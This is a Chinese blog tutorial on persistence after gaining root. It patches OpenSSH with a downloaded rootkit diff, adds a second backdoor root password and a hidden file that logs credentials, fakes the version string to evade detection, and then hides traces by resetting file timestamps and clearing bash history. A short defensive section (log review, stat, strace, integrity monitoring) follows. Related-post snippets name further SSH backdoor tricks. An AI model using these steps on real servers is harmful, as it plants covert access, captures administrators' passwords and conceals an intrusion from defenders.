ssh后门介绍与防御

已于 2023-01-02 17:52:31 修改
阅读量1.4k 收藏 6
点赞数
分类专栏: 网络安全 文章标签: 网络安全 kali linux
于 2021-08-04 00:35:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zx77588023/article/details/119359843
版权

文章目录

1 介绍

当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。

2 实战演练

实验环境:Centos7

2.1 查看版本

ssh -v

在这里插入图片描述
可以对ssh备份配置文件,可以对后期的文件时间进行修改

cp -p /etc/ssh/ssh_config  / etc/ssh/ssh_config.bak

cp -p /etc/ssh/ sshd_config  /etc/ssh/sshd_config.bak

2.2 下载SSH配置文件

官网:http://www.openssh.com/

openssh-5.9p1.tar.gz
openssh-5.9p1.patch.tar.gz

http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

2.3 安装

上传方法:中国蚁剑等

tar -zx vf openssh-5.9p1.tar.gz

tar -zx vf openssh-5.9p1.patch.tar.gz

openssh-5.9p1.patch中的sshbd5.9p1.diff复制到openssh-5.9p1

cp ./openssh-5.9p1.patch/sshbd5.9p1.diff ./openssh-5.9p1/sshbd5.9p1.diff

openssh-5.9p1中执行

patch < sshbd5.9p1.diff

如果patch 未安装

yum -y install patch。

在这里插入图片描述

2.4 修改后门密码and文件记录

vim includes.h

在这里插入图片描述
可以修改后门密码和记录文件,文件前面加 .相当于隐藏文件,也可以修改个隐蔽目录
修改后
在这里插入图片描述
修改版本
原则:修改为与我们刚才查看的版本信息一致,使其不易被发现。

vim version.h

在这里插入图片描述
在这里插入图片描述

2.5 编译安装

CentOS 7
首先对ssh里面的几个key的权限进行修改,否则可能进行编译的时候key不能修改而报错。

chmod 620 moduli
chmod 600  /etc/ssh/ssh_host_ed25519_key
chmod 600  /etc/ssh/ssh_host_ecdsa_key
chmod 600  /etc/ssh/ssh_host_rsa_key
chmod 600  /etc/ssh/ssh_host_ed25519_key

安装所需环境

yum install -y openssl openssl-devel pam-devel

编译安装

./configure --prefix=/usr --sysconfdir=/etc/ssh、

make && make install

service sshd restart

使用我们的后门密码可以正常登陆,以前的密码也有记录,实验成功

2.6 摸出痕迹

touch -r 老文件时间戳 新文件时间戳

touch -r /etc/ssh/ssh_config.bak / etc/ssh/ssh_config

touch -r /etc/ssh/sshd_config.bak / etc/ssh/sshd_config

清除操作日志

echo >/root/.bash_history //清空操作日志

还有log什么的

3 防御ssh后门

  1. 重装openssh,更新到最新版本

  2. 将SSH默认登录端口22改为其他端口

  3. IPTable中添加SSH访问策略

  4. 查看ssh配置文件和/usr/sbin/sshd的时间

    stat /usr/sbin/sshd

  5. 查看安全日志

    more /var/log/secure |grep Accepted

    排查ip在这里插入图片描述

  6. 通过strace监控sshd进程读写文件的操作一般的sshd后门都会将账户密码记录到文件,可以通过strace进程跟踪到ssh登录密码文件。

    ps axu | grep sshd | grep -v grep

端口监控:内网监控和外网监控:外网端口通过白名单控制,严禁私自开启外网端口;内网端口变化性比较大,需要多研究。

文件监控:
建立起文件监控体系,周期性检测文件的完整性,监控文件的权限变化。匹配软件MD5值以免软件被替换

配置安全:做好基线检测,服务器被入侵后,往往会修改用户配置,而通常hids并不会去检测文件的内容。基线配置的建立就显得尤为重要

流量检测:这一点常见的hids都能实现,snort什么的,关键是各种防御体系的联动以及分析,提取出安全事件,进而提升到威胁情报

参考文章:
https://hu3sky.github.io/2018/09/06/%E5%90%8E%E9%97%A8/

ubuntu有一点差异,参考下面文章
https://www.jianshu.com/p/c1cd73b072f1

https://www.secpulse.com/archives/69093.html

有勇气的牛排
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SSH三大框架介绍ppt课件.ppt
11-13
SSH三大框架介绍ppt课件.ppt
SSH密码暴力破解及防御实战
11-30
太狠了吧,SSH密码暴力破解及防御实战,注意安全了,下载学习
倒反天罡的ssh后门Linux 后门系列
最新发布
jijisaq的博客
04-08 1461
今天看见有安全研究员发了一篇 ssh 后门的文章,复现思考后分享给大家。
Unix ssh快速后门
10-22
Unix ssh快速后门linux 添加ssh后门ssh后门维持,linux定时任务,按照文档安装配置,可实现linux ssh后门登录
custom-ssh-backdoor:自定义 ssh 后门,使用 Paramiko 在 python 中编码
07-08
使用 Paramiko 的 SSH 后门 例子:
backdoored-ssh:后门 ssh
07-22
后门 ssh 我只是遵循了这个指南: :
ssh后门
weixin_34309435的博客
01-05 85
Linux SSH后门  可以让root账号有两个密码,不影响管理员正常登陆。  在includes.h 里面 修改密码,然后编译 安装.   unzip sshd.zip   cdopenssh   viversion.h   #defineSSH_VERSION"Op...
Linux 管理员的 10 个关键技巧(5)-SSH 后门
Fangrn的专栏
09-28 137
有很多次,我所在的站点需要某人的远程支持,而他却被公司防火强阻挡在外。很少有人意识到,如果能通过防火墙到达外部,那么也能轻松实现让外部的信息进来。 从本意讲,这称为 “在防火墙上砸一个洞”。我称之为 SSH 后门 。为了使用它,必须有一台作为中介的连接到 Internet 的机器。 在本例中,将这样台机器称为 blackbox.example.com。公司防火墙后面的机器称为 ginger。...
Linux系统安全之ssh后门
weixin_34321753的博客
09-30 165
1.ssh -V#查看当前的ssh版本信息#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 20102.查找ssh的配置文件一般都在/etc/ssh中3.备份原来的文件的time将/etc/ssh下的文件的备份假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old4.wget存在后门ssh#ht...
Linux 安全之SSH后门
weixin_34102807的博客
12-26 195
一.查看SSH版本[root@redkey vmshare]# ssh -V OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010二.下载SSH 源码包源码包:http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz后门文件:http://core.ip...
linux 简单ssh后门,Linux 安全之SSH后门
weixin_27310417的博客
05-12 271
一.查看SSH版本[root@redkey vmshare]# ssh -VOpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010二.下载SSH 源码包源码包:http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz后门文件:http://core.ipsecs.com/roo...
ssh与sftp分离.zip
11-10
ssh与sftp分离脚本,分离后可单独控制sftp服务,独立与ssh服务,单独指定sftp端口,并进行限定目录等各类操作,脚本执行前请先查看readmefirst,可选项也在readme中,有需要下载,有问题留言
Backdoor
weixin_45007073的博客
01-04 2732
Backdoor信息收集漏洞利用第一种方法第二种方法提权 信息收集 发现目标主机开放了ssh和web服务 我们将backdoor.htb添加到hosts文件中后,访问web服务,发现是一个WordPress页面,并且版本是5.8.1 既然是wordpress,那么我们可以直接使用wpscan来扫描存在哪些漏洞 wpscan --url http://backdoor.htb/ --api-token X4CFiaLdgwD6FwDMhkrZMpNjFDZ7Ex6DWqlcPM9DVic --enumer
LINUX权限维持和ssh免密登录
dj445566的博客
11-30 1007
本文的权限维持和ssh免密登录一些在渗透中非常重要的知识点,希望大家能够掌握
linux ssh backdoor,Linux Fokirtor Backdoor [新的Linux后门]
weixin_42532473的博客
05-12 231
日前,赛门铁克发布博客称,在五月的一次安全事件中,发现一名******了一个大型物联网托管服务商,并且在内部管理系统上使用了一个有意思的Linux后门 – Fokirtor。经过赛门铁克研究发现,该后门能够伪装它的通信流量,并伪装成正常的SSH通信流量。该后门支持***者运行常用的功能,如执行远程命令、反向链接到C&C服务器,Fokirtor能够监控SSH网络流量,如果检测到流量中存在冒号...
Exploit - Fortigate SSH Backdoor
Nixawk
01-15 2012
root@Exploit-Fortigate-SSH-Backdoor:~# python fortigate.py 192.168.1.100 DEBUG:paramiko.transport:starting thread (client mode): 0xb6f81e0cL DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-par
ssh软连接后门
weixin_60719780的博客
05-23 491
软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中会去PAM配置文件中寻找是否存在对应名称的配置信息(su),su在pam_rootok只检测uid 0 即认证成功,导致可以使用任意密码去登录。
三行代码的SSH后门
weixin_33694172的博客
05-08 236
2019独角兽企业重金招聘Python工程师标准>>> ...
通过SSH后门(创建ssh软链接)
songling515010475的专栏
05-10 2170
一、判断sshd_config配置中的UsePAM参数是否为yes cat /etc/ssh/sshd_config 二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。 三、通过命令创建后门软链接,通过查看端口己监听。 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345 netstat -antlp 四、通过另一台机器ssh进行任意密码登
清除后门ssh key
11-22
以下是清除后门SSH key的步骤: 1. 打开终端并输入以下命令以查看是否存在后门SSH key: ```shell cat ~/.ssh/authorized_keys ``` 2. 如果输出结果中包含未知的公钥,请备份并删除该文件: ```shell mv ~/.ssh/authorized_keys ~/.ssh/authorized_keys.bak rm ~/.ssh/authorized_keys ``` 3. 确认是否存在其他后门SSH key: ```shell ls -al ~/.ssh/ ``` 4. 如果存在其他后门SSH key,请备份并删除它们: ```shell mv ~/.ssh/<filename> ~/.ssh/<filename>.bak rm ~/.ssh/<filename> ``` 5. 最后,更新已知主机密钥: ```shell ssh-keygen -R localhost ``` 这将从已知主机密钥列表中删除本地主机的条目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

有勇气的牛排

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值